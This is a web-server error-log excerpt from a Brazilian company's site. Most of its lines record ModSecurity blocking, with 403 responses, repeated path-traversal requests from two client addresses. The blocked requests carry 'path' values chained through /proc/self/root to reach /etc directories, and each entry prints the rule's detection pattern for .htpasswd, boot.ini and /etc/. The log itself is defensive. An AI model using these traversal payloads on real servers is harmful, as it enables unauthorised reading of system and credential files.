[uri "/"] [unique_id "abzqmBCii7xarUs8iHYyCQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:06.157167 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:42166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqmrninkcc-iUj5Aor6wAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:07.564937 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:44178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqm11pVZ5mVmJwsFP_ZAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:08.859731 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.241.31:44194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqnLninkcc-iUj5Aor7gAAA44"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:10.182904 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:44204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqnvqxLDW4GITHUkSwGwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:11.448219 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:44208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqn9a6ubjKNq_cu4acXQAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:12.283006 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:60536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqoAF0L0L-SsrnPo42CwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:21.322036 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:44224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqqda6ubjKNq_cu4acZQAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:22.616248 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:36248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqql1pVZ5mVmJwsFP_aAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:24.509372 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:51046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqrDJ3M9BSuKP7CAbd5QAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:25.040135 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:36264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqrda6ubjKNq_cu4acZwAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:27.393868 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:36278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqr-oXxyEfFpUF8f9SCAAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:30.169488 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:53030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqsPXLqtnMIWvjpaJnDwAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:30.174815 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:52428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqsuoXxyEfFpUF8f9SCgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:31.439310 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:53038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqswF0L0L-SsrnPo42DgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:31.504070 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:34782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqs9a6ubjKNq_cu4acaAAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:35:32.780441 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:53042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqtBCii7xarUs8iHYyEQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:32.870487 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:34794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqtAF0L0L-SsrnPo42DwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:35.236751 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:53046] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqt_XLqtnMIWvjpaJnEQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:37.568383 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:53052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqufXLqtnMIWvjpaJnGAAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:38.894950 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:40968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzquvqxLDW4GITHUkSwJAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:41.329141 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:40976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqvda6ubjKNq_cu4acbwAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:35:41.733623 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 66.249.74.160:48862] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:35:43.856453 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:40982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzqv9a6ubjKNq_cu4accwAAA0o"], referer: 